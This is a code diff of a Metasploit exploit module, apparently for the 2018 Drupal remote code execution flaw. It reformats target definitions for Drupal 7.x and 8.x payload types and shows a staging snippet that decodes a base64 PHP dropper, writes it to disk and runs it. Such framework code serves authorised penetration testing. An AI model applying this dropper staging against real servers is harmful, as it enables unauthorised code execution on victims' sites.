@@ -41,8 +41,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2018-03-28',
         'License' => MSF_LICENSE,
-        'Platform' => ['php', 'unix', 'linux'],
-        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
         'Payload' => { 'BadChars' => '&>\'' },
         'Targets' => [
@@ -51,89 +49,113 @@ class MetasploitModule < Msf::Exploit::Remote
           #
           [
             'Automatic (PHP In-Memory)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Type' => :php_memory
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_memory
+            }
           ],
           [
             'Automatic (PHP Dropper)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Type' => :php_dropper
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_dropper
+            }
           ],
           [
             'Automatic (Unix In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Type' => :unix_memory
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory
+            }
           ],
           [
             'Automatic (Linux Dropper)',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Type' => :linux_dropper
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
           ],
           #
           # Drupal 7.x targets (PHP, cmd/unix, native)
           #
           [
             'Drupal 7.x (PHP In-Memory)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Version' => Rex::Version.new('7'),
-            'Type' => :php_memory
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Version' => Rex::Version.new('7'),
+              'Type' => :php_memory
+            }
           ],
           [
             'Drupal 7.x (PHP Dropper)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Version' => Rex::Version.new('7'),
-            'Type' => :php_dropper
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Version' => Rex::Version.new('7'),
+              'Type' => :php_dropper
+            }
           ],
           [
             'Drupal 7.x (Unix In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Version' => Rex::Version.new('7'),
-            'Type' => :unix_memory
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Version' => Rex::Version.new('7'),
+              'Type' => :unix_memory
+            }
           ],
           [
             'Drupal 7.x (Linux Dropper)',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Version' => Rex::Version.new('7'),
-            'Type' => :linux_dropper
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Version' => Rex::Version.new('7'),
+              'Type' => :linux_dropper
+            }
           ],
           #
           # Drupal 8.x targets (PHP, cmd/unix, native)
           #
           [
             'Drupal 8.x (PHP In-Memory)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Version' => Rex::Version.new('8'),
-            'Type' => :php_memory
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Version' => Rex::Version.new('8'),
+              'Type' => :php_memory
+            }
           ],
           [
             'Drupal 8.x (PHP Dropper)',
-            'Platform' => 'php',
-            'Arch' => ARCH_PHP,
-            'Version' => Rex::Version.new('8'),
-            'Type' => :php_dropper
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Version' => Rex::Version.new('8'),
+              'Type' => :php_dropper
+            }
           ],
           [
             'Drupal 8.x (Unix In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Version' => Rex::Version.new('8'),
-            'Type' => :unix_memory
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Version' => Rex::Version.new('8'),
+              'Type' => :unix_memory
+            }
           ],
           [
             'Drupal 8.x (Linux Dropper)',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Version' => Rex::Version.new('8'),
-            'Type' => :linux_dropper
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Version' => Rex::Version.new('8'),
+              'Type' => :linux_dropper
+            }
           ]
         ],
         'DefaultTarget' => 0, # Automatic (PHP In-Memory)
@@ -251,12 +273,12 @@ class MetasploitModule < Msf::Exploit::Remote
     dropper = Rex::Text.encode_base64(dropper)
 
     # Stage 1 decodes the PHP and writes it to disk
-    stage1 = %Q{
+    stage1 = %{
       file_put_contents("#{php_file}", base64_decode("#{dropper}"));
     }
 
     # Stage 2 executes said PHP in-process
-    stage2 = %Q{
+    stage2 = %{
       include_once("#{php_file}");
     }
 
